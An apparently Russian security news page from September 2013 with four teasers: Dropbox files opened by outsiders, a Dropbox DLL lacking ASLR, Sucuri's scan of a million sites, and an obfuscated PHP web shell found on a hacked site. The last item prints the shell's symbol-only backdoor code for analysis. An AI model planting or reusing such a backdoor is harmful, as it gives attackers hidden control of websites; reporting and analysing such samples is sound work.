Меню сайта |
|
|
Мини-чат |
|
|
|
Главная » 2013 » Сентябрь » 17
Не секрет, что в документы MS Office или PDF можно вставить
специальные следящие скрипты для проверки, с какого IP открыли файл, в
какое время и т.д. Такими средствами давно пользуются маркетологи.
Каждый раз при открытии файла документ отправляет GET-запрос на
удаленный сервер, где регистрируется это событие. Среди прочих,
возможность внедрения следящих скриптов предлагает сервис HoneyDocs.
Один из пользователей HoneyDocs внедрил скрипт в файл passwords.doc —
и закачал его в свою личную папку Dropbox. Каково же было его
удивление, когда через 10 минут на сервере появилось сообщение, что файл
открыт. Ведь он еще ни с кем не делился ссылкой, да и вообще закачал
файл в персональную папку, к которой запрещен посторонний доступ.
Пользователь продолжил свой эксперимент. Он удалил файл и закачал его повторно. В этот раз посторонних посещений не было, но они были
...
Читать дальше »
Просмотров: 557 |
Добавил: vayrus |
Дата: 17.09.2013
|
Специалист по безопасности и пользователь программы Dropbox Грэм
Сазерленд (Graham Sutherland) обнаружил уязвимость в клиентском
приложении Dropbox под Windows (32 бит).
128-килобайтная библиотека DropboxExt19.dll загружается в память,
внедряясь в различные процессы, чтобы обеспечить контекстную
функциональность, в том числе вызываемую по щелчку правой кнопки мыши.
Среди прочего, она внедряется также в firefox.exe и другие процессы.
Но самое интересное, что эта библиотека не использует технологию рандомизации памяти ASLR (Address space layout randomization).
ASLR — один из главных механизмов защиты операционной системы Windows
от запуска различных эксплойтов, в том числе с переполнением буфера.
Как показывает практика с последними браузерным
...
Читать дальше »
Просмотров: 632 |
Добавил: vayrus |
Дата: 17.09.2013
|
Компания Sucuri осуществила проверку
миллиона крупнейших сайтов интернета (по версии Alexa) на предмет
уязвимостей, устаревшего серверного ПО и зловредов. Результаты плачевны.
Из миллиона сайтов 108 781 признаны небезопасными, а 18 557 из них
уже внесены в черные списки антивирусных компаний и поисковых систем. На
диаграмме можно увидеть, что самая большая в мире база зараженных
сайтов — у McAffee, на втором месте Sucuri Labs, а на третьем —
российский «Яндекс», далее следуют Norton, ESET и Google. База
вредоносных сайтов «Яндекса» по этой выборке примерно в шесть раз
полнее, чем у Google: 2154 штуки против 357.
Еще 4836 сайтов из миллиона заражены поисковым спамом — самым популярным методом инъекций.
Пугающе много сайтов (67 509) работают под устаревшим и уя
...
Читать дальше »
Просмотров: 554 |
Добавил: vayrus |
Дата: 17.09.2013
|
Администратор одного из веб-сайтов жалуется, что его сайт подвергся взлому. Он обнаружил PHP-шелл, в коде которого не было ни одной буквы или цифры.
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
Админ просит объяснить, что это такое. Специалисты компании Sucuri
объясняют, что суть бэкдоров в максимальной скрытности, поэтому их
авторы часто прибегают к необычным методам обфускации. Например, первая строчка @$_[]
...
Читать дальше »
Просмотров: 676 |
Добавил: vayrus |
Дата: 17.09.2013
|
|
| |
Форма входа |
|
|
Календарь новостей |
|
|
Поиск |
|
|
Друзья сайта |
|
|
Статистика |
Онлайн всего: 1 Гостей: 1 Пользователей: 0
|
|
|